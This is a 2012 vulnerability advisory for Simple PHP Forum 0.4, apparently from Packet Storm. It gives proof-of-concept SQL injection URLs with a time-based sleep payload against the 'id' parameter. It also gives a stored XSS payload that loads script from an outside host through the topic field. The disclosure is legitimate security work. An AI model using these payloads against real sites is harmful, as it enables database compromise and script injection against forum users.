Sphpforum 0.4 Cross Site Scripting / SQL Injection

2012-08-16T00:00:00
ID PACKETSTORM:115591
Type packetstorm
Reporter loneferret
Modified 2012-08-16T00:00:00

Description

                                        
                                            `# Author: loneferret of Offensive Security  
# Product: sphpforum  
# Version: 0.4 (older versions may be affected)  
#  
# Software Download: http://sourceforge.net/projects/sphpforum/  
  
# Description:  
# Simple PHP Forum is a PHP based forum/BBS board is designed to be small, simple,  
# fast and allow easy integration into any existing web site.  
  
# Vulnerability:  
# Due to improper input sanitation, parameters are prone to SQL injection. Stored  
# crossed site scripting is also present in some forms.  
  
# PoC 1:  
# SQL Injection  
# Page: view_topic.php / view_profile.php?  
# Vulnerable param: 'id'  
# http://172.16.194.148/sphpforum/sphpforum-0.4/view_topic.php?id=50%27%20and%20sleep%2810%29%20and%20%271%27=%271  
# http://172.16.194.148/sphpforum/sphpforum-0.4/view_profile.php?id=loneferret%27%20and%20sleep%2810%29%20and%20%271%27=%271  
  
# PoC 2:  
# Stored XSS  
# Page: create_topic.php  
# Vulnerable field: Topic  
# Payload: <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>  
  
`